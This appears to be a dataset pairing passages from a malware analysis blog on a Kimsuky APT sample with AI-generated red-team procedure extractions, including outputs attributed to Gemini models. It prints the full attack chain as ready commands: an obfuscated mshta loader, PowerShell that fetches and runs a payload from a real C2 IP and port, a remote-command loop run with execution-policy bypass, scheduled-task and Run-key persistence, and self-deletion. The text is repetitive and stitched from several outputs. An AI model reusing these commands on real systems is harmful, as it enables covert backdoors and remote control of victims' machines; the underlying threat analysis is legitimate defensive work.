28 29 30 } } $Musnciuhwefx = MuTxdonewd -sefncevID 'ScR38294' → This function defines a mutex, which is a synchronization object to ensure that only one instance of the script or malware is running at a time. The Mutex ensures that if the script is already running, a new instance of it cannot be initiated. If an existing instance is found, the script will exit. The script calls the mutex function MuTxdonewd with a specific ID (ScR38294) 1 2 3 4 5 6 7 8 while($true) { $tcpConnection = New-Object System.Net.Sockets.TcpClient($unmcnex, $yutbbc) $tcpStream = $tcpConnection.GetStream() $reader = New-Object System.IO.StreamReader($tcpStream) $writer = New-Object System.IO.StreamWriter($tcpStream) $writer.AutoFlush = $true → The script creates a TCP connection to the C2 server on port 7032. It continuously reads input from the C2 server using the $reader and sends output using the $writer. 1 2 3 4 5 6 7 8 9 10 11 12 $cmd = $reader.ReadLine() if($cmd.Length -ne 0) { $tmpz = "c:\programdata\tmps2.ps1" $cmd \| Out-File $tmpz powershell -ep bypass -f $tmpz; del $tmpz; } Sleep(20); } → The script reads commands from C2 server and the commands are written to a temporary file(tmps2.ps1). The command is later on executed through powershell. Like earlier cleanup of the temporary file is done. The script listens for new commands every 20 seconds. Not The End → From the moment I first encountered Kimsuky APT, I was intrigued by their operations. Their tactics, techniques, and persistence had always fascinated me, but I never had the chance to interact directly with them. However, this time was different. For the first time, they acknowledged my presence with a simple yet telling message from their side. It was a subtle but clear sign that the conversation had finally begun…	Phase: Execution Technique: Mutex Creation for Single Instance Execution Procedure: The script defines a mutex using the function `MuTxdonewd` with a specific ID `ScR38294` to ensure only one instance of the script runs at a time. Phase: Command and Control (C2) Technique: Custom C2 Communication Command: `powershell while($true) { $tcpConnection = New-Object System.Net.Sockets.TcpClient($unmcnex, $yutbbc) $tcpStream = $tcpConnection.GetStream() $reader = New-Object System.IO.StreamReader($tcpStream) $writer = New-Object System.IO.StreamWriter($tcpStream) $writer.AutoFlush = $true }` Description: Establishes a persistent TCP connection to the C2 server and sets up readers and writers for communication. Phase: Execution Technique: PowerShell Execution via Script File Procedure: Command: ```powershell $cmd = $reader.ReadLine() if($cmd.Length -ne 0) { $tmpz = "c:\programdata\tmps2.ps1" $cmd \| Out-File $tmpz `powershell -ep bypass -f $tmpz; del $tmpz;` } Sleep(20); `` - Description: Commands received from C2 are written to a temporary PowerShell script (tmps2.ps1`), executed with PowerShell using`-ep bypass` to bypass execution policies, and the temporary file is deleted. The script checks for new commands every 20 seconds.
But before that let’s see what happens when we run the script in our VM in order to verify our findings. On running the sample we can check the registry keys inside HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Winload. This key was used for persistence in one of the VBS scripts to register a task that runs the .vbs file at startup These were the files that were dropped, verifying our findings. Last but not the least - Like the nutjob I am, I left my VM connected to internet for 13 hours anticipating that maybe we see a reply from the C2 server. Remember that the response from C2 server will be written in a file called tmps2.ps1. I changed the code a bit to prevent it from auto deleting after getting the response. And there it was after roughly 6 hours of running the initial sample, the file was dropped and there it was the reply I was always hankering for. What did they send ? ▸ Click to reveal spoiler Yes this is the command I received from the C2 but unfortunately nothing further was received. Soon it was silence, the connection fizzled out, leaving nothing more than traces of digital dust and that one lingering message. And just like that, the window into their world closed. Was it a taunt? A sign of respect? Or merely an oversight from an ever-watchful adversary? I’ll never know.	Phase: Persistence Technique: Registry Run Keys / Startup Folder Procedure: The attacker utilized a VBS script to modify the registry key: Key: `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Winload` Purpose: Registers a task to run the .vbs file at startup. Phase: Command and Control (C2) Technique: Custom Command and Control Protocol Procedure: The threat actor maintained a C2 connection, which periodically wrote responses to a PowerShell script file: File: `tmps2.ps1` Command: Specific command(s) sent by C2 were written to `tmps2.ps1`, which were executed in the victim environment, though the exact command received was not detailed in the report. Ensure that any commands or behaviors inferred from the context of the CTI report align with known TTPs for accurate emulation and analysis.
Overview → The sample we’ve analyzed here fits perfectly into the broader pattern of cyber attacks attributed to the Kimsuky APT group, a known North Korean-linked threat actor. From the use of LNK files as an initial infection vector to the deployment of VBS scripts for persistence and communication with a remote C2 server, the techniques align with past campaigns orchestrated by this group. → In this case, we observe a well-crafted attack that leverages stealth and obfuscation techniques, including Base64 encoding, Caesar Cipher obfuscation, and the use of scheduled tasks and registry keys to maintain persistence on the victim’s machine. The clear attention to detail in avoiding static detection, such as splitting command strings, shows the group’s sophistication. → The communication to the C2 server and the ultimate payload execution leave no doubt that this campaign is aimed at gaining persistent access to the victim’s machine for extended periods, likely to exfiltrate information or manipulate systems in espionage-related activities. Let’s hope next time malwrhunterteam tags us when something like this comes <3. IOC 1 2 3 4 5 6 7 8 Upbit_20240916.docx.lnk MD5 37fb639a295daa760c739bc21c553406 SHA-1 50e4d8a112e4aad2c984d22f83c80c8723f232da SHA-256 41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229	Phase: Initial Access Technique: LNK File Execution Procedure: An LNK file named `Upbit_20240916.docx.lnk` is used to initiate the attack. It likely contains commands to execute a malicious script or program upon clicking. Phase: Execution Technique: VBS Script Execution Procedure: VBS scripts are deployed to run malicious code, maintaining stealth through obfuscation techniques such as Base64 encoding and Caesar Cipher to hide the script content. Phase: Persistence Technique 1: Registry Key Modification Procedure: Registry keys are modified to ensure scripts or executables are run at startup, enabling persistence. Technique 2: Scheduled Task Creation Procedure: Scheduled tasks are used to run scripts or payloads at specific times or intervals, maintaining persistent access. Phase: Defense Evasion Technique: Obfuscation Procedure: Commands and scripts are split and encoded (e.g., using Base64 and Caesar Cipher) to avoid static detection and signature-based antivirus. Phase: Command and Control Technique: Remote C2 Communication Procedure: Scripts communicate with a remote C2 server to receive instructions or payloads, enabling external control over the infected machine. This structured outline captures the essential techniques and procedures used in the attack, focusing on command-line actions and tactics for red team emulation.

Gemini 2.0

Gemini 2.0
Model: gemini-2.0-flash Phase: Initial Access Technique: Spearphishing via Malicious LNK file Procedure: The attacker sends a spearphishing email containing a malicious LNK file. Phase: Execution Technique: MSHTA.exe Execution Command: mshta.exe javascript:p="se64String($z);$";s="Stream";w="a=new Act"+"iveXObject("WScr"+"ipt.Shell'); a.Run(c,0,0); close();"; a="System.IO."+s;t=" -Path $t -";n="New-Object System.";d="c:\\programdata";c="power"+"shell -ep bypass -c $r='64.49.14.181'; $p='8014'; $r="+n+"IO. "+s+"Reader(("+n+"Net.Sockets. TcpClient($r, $p)).Get"+s+"()); $z=$r.ReadLine(); $b=[Con"+"vert]::FromBa"+p+"t='"+d+"\\t.zip'; Set-Content"+t+"V $b -Encoding Byte; Expand-Archive"+t+"D "+d+"; del $t; $v='"+d+"\\s.vbs'; &$v; sc "+d+"\\nt91610 81"; eval(w); Phase: Execution Technique: PowerShell Execution Command: `powershell -ep bypass -c $r='64.49.14.181'; $p='8014'; $r=New-Object System.IO.StreamReader((New-Object System.Net.Sockets.TcpClient($r, $p)).GetStream()); $z=$r.ReadLine(); $b=[Convert]::FromBase64String($z); Set-Content -Path 'C:\ProgramData\t.zip' -Value $b -Encoding Byte; Expand-Archive -Path 'C:\ProgramData\t.zip' -DestinationPath 'C:\ProgramData'; del 'C:\ProgramData\t.zip'; $v='C:\ProgramData\s.vbs'; &$v; sc C:\ProgramData\nt91610 81` Phase: Persistence Technique: Scheduled Task creation Command: `cmd /c schtasks /create /sc minute /mo 1 /tn MicrosoftEdgeUpdateTaskMSCore[57174-71251-9342] /tr ""wscript //e:vbscript //b C:\ProgramData\\07578.tmp"" /f` Phase: Persistence Technique: Registry Modification Command: `reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Winload /t REG_SZ /d ""c:\\windows\\system32\\wscript.exe //b //e:vbscript C:\\ProgramData\\R9147.vbs"" /f"` Phase: Lateral Movement/Execution Technique: PowerShell Invoke-Expression Command: `powershell -ep bypass -command $fn='C:\\ProgramData\\xM578.tmp';$d = Get-Content $fn; Invoke-Expression $d;` Phase: Cleanup and Execution Technique: VBScript Delete File Command: Execute script which contains : `Scripting.FileSystemObject().DeleteFile("C:\\ProgramData\\s.vbs")` Phase: Execution Technique: PowerShell script execution Command: `powershell -ep bypass -f $tmpz` where `$tmpz = "c:\\programdata\\tmps2.ps1"`

Model: gemini-2.0-flash

Phase: Initial Access

Technique: Spearphishing via Malicious LNK file
Procedure: The attacker sends a spearphishing email containing a malicious LNK file.

Phase: Execution

Technique: MSHTA.exe Execution
Command: mshta.exe javascript:p="se64String($z);$";s="Stream";w="a=new Act"+"iveXObject("WScr"+"ipt.Shell'); a.Run(c,0,0); close();"; a="System.IO."+s;t=" -Path $t -";n="New-Object System.";d="c:\\programdata";c="power"+"shell -ep bypass -c $r='64.49.14.181'; $p='8014'; $r="+n+"IO. "+s+"Reader(("+n+"Net.Sockets. TcpClient($r, $p)).Get"+s+"()); $z=$r.ReadLine(); $b=[Con"+"vert]::FromBa"+p+"t='"+d+"\\t.zip'; Set-Content"+t+"V $b -Encoding Byte; Expand-Archive"+t+"D "+d+"; del $t; $v='"+d+"\\s.vbs'; &$v; sc "+d+"\\nt91610 81"; eval(w);

Phase: Execution

Technique: PowerShell Execution
Command: powershell -ep bypass -c $r='64.49.14.181'; $p='8014'; $r=New-Object System.IO.StreamReader((New-Object System.Net.Sockets.TcpClient($r, $p)).GetStream()); $z=$r.ReadLine(); $b=[Convert]::FromBase64String($z); Set-Content -Path 'C:\ProgramData\t.zip' -Value $b -Encoding Byte; Expand-Archive -Path 'C:\ProgramData\t.zip' -DestinationPath 'C:\ProgramData'; del 'C:\ProgramData\t.zip'; $v='C:\ProgramData\s.vbs'; &$v; sc C:\ProgramData\nt91610 81

Phase: Persistence

Technique: Scheduled Task creation
Command: cmd /c schtasks /create /sc minute /mo 1 /tn MicrosoftEdgeUpdateTaskMSCore[57174-71251-9342] /tr ""wscript //e:vbscript //b C:\ProgramData\\07578.tmp"" /f

Phase: Persistence

Technique: Registry Modification
Command: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Winload /t REG_SZ /d ""c:\\windows\\system32\\wscript.exe //b //e:vbscript C:\\ProgramData\\R9147.vbs"" /f"

Phase: Lateral Movement/Execution

Technique: PowerShell Invoke-Expression
Command: powershell -ep bypass -command $fn='C:\\ProgramData\\xM578.tmp';$d = Get-Content $fn; Invoke-Expression $d;

Phase: Cleanup and Execution

Technique: VBScript Delete File
Command: Execute script which contains : Scripting.FileSystemObject().DeleteFile("C:\\ProgramData\\s.vbs")

Phase: Execution

Technique: PowerShell script execution
Command: powershell -ep bypass -f $tmpz where $tmpz = "c:\\programdata\\tmps2.ps1"

Gemini 2.5

Gemini 2.5
Model: gemini-2.5-flash-preview-05-20 Here's a structured breakdown of the threat actor's procedures for red team emulation, focusing on commands, tools, and techniques while excluding specific IOCs: Phase: Initial Access Technique: Phishing via Malicious LNK File Procedure: The attacker delivers a malicious LNK file, disguised as a document, likely via spear-phishing campaigns. Phase: Execution / Initial Payload Delivery Technique: Command Line Execution via MSHTA and PowerShell Command: mshta.exe javascript:p="se64String($z);$";s="Stream";w="a=new Act"+"iveXObject("WScr"+"ipt.Shell'); a.Run(c,0,0); close();"; a="System.IO."+s;t="-Path $t -";n="New-Object System.";d="c:\\programdata";c="power"+"shell -ep bypass -c $r='<C2_IP>'; $p='<C2_Port>'; $r="+n+"IO. "+s+"Reader(("+n+"Net.Sockets.TcpClient($r,$p)).Get"+s+"()); $z=$r.ReadLine(); $b=[Con"+"vert]::FromBa"+p+"t='"+d+"\\t.zip'; Set-Content"+t+"V $b -Encoding Byte; Expand-Archive"+t+"D "+d+"; del $t; $v='"+d+"\\s.vbs'; &$v; sc "+d+"\\nt91610 81"; eval(w); Note: This command uses `mshta.exe` to execute an embedded JavaScript payload, which then constructs and executes a PowerShell command. `<C2_IP>` and `<C2_Port>` are placeholders for the actual C2 server details. Procedure: The executed PowerShell command performs the following steps: Establishes a TCP connection to a C2 server. Reads a Base64-encoded payload from the C2. Decodes the Base64 payload. Saves the decoded payload as `t.zip` in `C:\ProgramData`. Extracts the contents of `t.zip` to `C:\ProgramData`. Deletes the `t.zip` file. Executes the extracted `s.vbs` script from `C:\ProgramData`. Attempts to execute `sc C:\ProgramData\nt91610 81` (purpose of `sc` with a file path is unclear from report but is part of the executed string). Tools: `mshta.exe`, `powershell.exe`, `System.Net.Sockets.TcpClient` (via PowerShell), `System.IO.StreamReader` (via PowerShell), `Convert.FromBase64String` (via PowerShell), `Set-Content` (via PowerShell), `Expand-Archive` (via PowerShell), `del` (via PowerShell). Phase: Defense Evasion & Persistence (via s.vbs) Technique: Obfuscated Script Execution (Caesar Cipher) Procedure: VBScripts (`s.vbs`, `R9147.vbs`) use a simple character shifting (Caesar Cipher) algorithm to decode embedded malicious strings and payloads, making static analysis harder. Tools: Custom VBScript decoding logic. Technique: Scheduled Task Creation Command: `cmd /c schtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMSCore[57174-71251-9342]" /tr "wscript //e:vbscript //b C:\ProgramData\07578.tmp" /f` Procedure: Creates a scheduled task named `MicrosoftEdgeUpdateTaskMSCore[...]` that runs every minute, executing a hidden VBScript file (`07578.tmp`) using `wscript.exe`. Tools: `cmd.exe`, `schtasks.exe`, `wscript.exe`. Technique: Decoy File Creation Procedure: Creates an empty DOCX file (`C:\ProgramData\DOC578309.docx`) and then opens it using the default application (e.g., Microsoft Word) to distract the user. Tools/APIs: `Scripting.FilesystemObject` (VBScript), `Shell.Application` (VBScript). Technique: Registry Run Key Modification Command: `cmd /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Winload /t REG_SZ /d "c:\windows\system32\wscript.exe //b //e:vbscript C:\ProgramData\R9147.vbs" /f` Procedure: Adds an entry named `Winload` to the `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` registry key to ensure that `R9147.vbs` is executed every time the system starts. Tools: `cmd.exe`, `reg.exe`, `wscript.exe`. Technique: PowerShell Execution of Dropped Script Command: `powershell -ep bypass -command $fn='C:\ProgramData\xM578.tmp';$d = Get-Content $fn; Invoke-Expression $d;` Procedure: Executes the contents of `xM578.tmp` as a PowerShell script, bypassing execution policies. Tools: `powershell.exe`. Technique: Self-Deletion Procedure: After completing its tasks, the `s.vbs` script pauses for two seconds and then deletes itself from `C:\ProgramData`. Tools/APIs: `WScript.Sleep` (VBScript), `Scripting.FileSystemObject.DeleteFile` (VBScript). Phase: Defense Evasion (via xM578.tmp) Technique: Mutex for Single Instance Procedure: The `xM578.tmp` script creates a mutex (`System.Threading.Mutex`) with the ID `ScR38294` to prevent multiple instances of the malware from running simultaneously on the system. Tools/APIs: `System.Threading.Mutex` (via PowerShell). Phase: Command and Control (via xM578.tmp) Technique: Continuous C2 Communication over TCP Procedure: The `xM578.tmp` PowerShell script establishes a persistent TCP connection to a C2 server on port `<C2_Port>` and continuously reads commands and sends output. Tools/APIs: `System.Net.Sockets.TcpClient` (via PowerShell), `System.IO.StreamReader` (via PowerShell), `System.IO.StreamWriter` (via PowerShell). Technique: Remote Command Execution Procedure: Commands received from the C2 server are written to a temporary PowerShell script (`C:\ProgramData\tmps2.ps1`). This temporary script is then executed, and subsequently deleted. The process repeats every 20 seconds. Command: `powershell -ep bypass -f C:\ProgramData\tmps2.ps1` Tools: `powershell.exe`.

Model: gemini-2.5-flash-preview-05-20

Here's a structured breakdown of the threat actor's procedures for red team emulation, focusing on commands, tools, and techniques while excluding specific IOCs:

Phase: Initial Access

Technique: Phishing via Malicious LNK File
Procedure: The attacker delivers a malicious LNK file, disguised as a document, likely via spear-phishing campaigns.

Phase: Execution / Initial Payload Delivery

Technique: Command Line Execution via MSHTA and PowerShell
Command: mshta.exe javascript:p="se64String($z);$";s="Stream";w="a=new Act"+"iveXObject("WScr"+"ipt.Shell'); a.Run(c,0,0); close();"; a="System.IO."+s;t="-Path $t -";n="New-Object System.";d="c:\\programdata";c="power"+"shell -ep bypass -c $r='<C2_IP>'; $p='<C2_Port>'; $r="+n+"IO. "+s+"Reader(("+n+"Net.Sockets.TcpClient($r,$p)).Get"+s+"()); $z=$r.ReadLine(); $b=[Con"+"vert]::FromBa"+p+"t='"+d+"\\t.zip'; Set-Content"+t+"V $b -Encoding Byte; Expand-Archive"+t+"D "+d+"; del $t; $v='"+d+"\\s.vbs'; &$v; sc "+d+"\\nt91610 81"; eval(w);
- Note: This command uses mshta.exe to execute an embedded JavaScript payload, which then constructs and executes a PowerShell command. <C2_IP> and <C2_Port> are placeholders for the actual C2 server details.
Procedure: The executed PowerShell command performs the following steps:
1. Establishes a TCP connection to a C2 server.
2. Reads a Base64-encoded payload from the C2.
3. Decodes the Base64 payload.
4. Saves the decoded payload as t.zip in C:\ProgramData.
5. Extracts the contents of t.zip to C:\ProgramData.
6. Deletes the t.zip file.
7. Executes the extracted s.vbs script from C:\ProgramData.
8. Attempts to execute sc C:\ProgramData\nt91610 81 (purpose of sc with a file path is unclear from report but is part of the executed string).
Tools: mshta.exe, powershell.exe, System.Net.Sockets.TcpClient (via PowerShell), System.IO.StreamReader (via PowerShell), Convert.FromBase64String (via PowerShell), Set-Content (via PowerShell), Expand-Archive (via PowerShell), del (via PowerShell).

Phase: Defense Evasion & Persistence (via s.vbs)

Technique: Obfuscated Script Execution (Caesar Cipher)
Procedure: VBScripts (s.vbs, R9147.vbs) use a simple character shifting (Caesar Cipher) algorithm to decode embedded malicious strings and payloads, making static analysis harder.
Tools: Custom VBScript decoding logic.
Technique: Scheduled Task Creation
Command: cmd /c schtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMSCore[57174-71251-9342]" /tr "wscript //e:vbscript //b C:\ProgramData\07578.tmp" /f
Procedure: Creates a scheduled task named MicrosoftEdgeUpdateTaskMSCore[...] that runs every minute, executing a hidden VBScript file (07578.tmp) using wscript.exe.
Tools: cmd.exe, schtasks.exe, wscript.exe.
Technique: Decoy File Creation
Procedure: Creates an empty DOCX file (C:\ProgramData\DOC578309.docx) and then opens it using the default application (e.g., Microsoft Word) to distract the user.
Tools/APIs: Scripting.FilesystemObject (VBScript), Shell.Application (VBScript).
Technique: Registry Run Key Modification
Command: cmd /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Winload /t REG_SZ /d "c:\windows\system32\wscript.exe //b //e:vbscript C:\ProgramData\R9147.vbs" /f
Procedure: Adds an entry named Winload to the HKCU\Software\Microsoft\Windows\CurrentVersion\Run registry key to ensure that R9147.vbs is executed every time the system starts.
Tools: cmd.exe, reg.exe, wscript.exe.
Technique: PowerShell Execution of Dropped Script
Command: powershell -ep bypass -command $fn='C:\ProgramData\xM578.tmp';$d = Get-Content $fn; Invoke-Expression $d;
Procedure: Executes the contents of xM578.tmp as a PowerShell script, bypassing execution policies.
Tools: powershell.exe.
Technique: Self-Deletion
Procedure: After completing its tasks, the s.vbs script pauses for two seconds and then deletes itself from C:\ProgramData.
Tools/APIs: WScript.Sleep (VBScript), Scripting.FileSystemObject.DeleteFile (VBScript).

Phase: Defense Evasion (via xM578.tmp)

Technique: Mutex for Single Instance
Procedure: The xM578.tmp script creates a mutex (System.Threading.Mutex) with the ID ScR38294 to prevent multiple instances of the malware from running simultaneously on the system.
Tools/APIs: System.Threading.Mutex (via PowerShell).

Phase: Command and Control (via xM578.tmp)

Technique: Continuous C2 Communication over TCP
Procedure: The xM578.tmp PowerShell script establishes a persistent TCP connection to a C2 server on port <C2_Port> and continuously reads commands and sends output.
Tools/APIs: System.Net.Sockets.TcpClient (via PowerShell), System.IO.StreamReader (via PowerShell), System.IO.StreamWriter (via PowerShell).
Technique: Remote Command Execution
Procedure: Commands received from the C2 server are written to a temporary PowerShell script (C:\ProgramData\tmps2.ps1). This temporary script is then executed, and subsequently deleted. The process repeats every 20 seconds.
Command: powershell -ep bypass -f C:\ProgramData\tmps2.ps1
Tools: powershell.exe.

Kimsuky A Gift That Keeps on Giving

Phase: Execution

Phase: Command and Control

Phase: File Decryption and Execution

Phase: Persistence (Inference)

Phase: Initial Access

Phase: Execution

Phase: Execution

Phase: Persistence

Phase: Persistence

Phase: Execution

Phase: Defense Evasion

Phase: Execution (Distraction)

Phase: Execution

Phase: Execution

Phase: Defense Evasion

Phase: Persistence

Phase: Execution

Phase: Command and Control (C2)

Phase: Execution

Phase: Persistence

Phase: Command and Control (C2)

Phase: Initial Access

Phase: Execution

Phase: Persistence

Phase: Defense Evasion

Phase: Command and Control

Model: gemini-2.0-flash

Phase: Initial Access

Phase: Execution

Phase: Execution

Phase: Persistence

Phase: Persistence

Phase: Lateral Movement/Execution

Phase: Cleanup and Execution

Phase: Execution

Model: gemini-2.5-flash-preview-05-20

Phase: Initial Access

Phase: Execution / Initial Payload Delivery

Phase: Defense Evasion & Persistence (via s.vbs)

Phase: Defense Evasion (via xM578.tmp)

Phase: Command and Control (via xM578.tmp)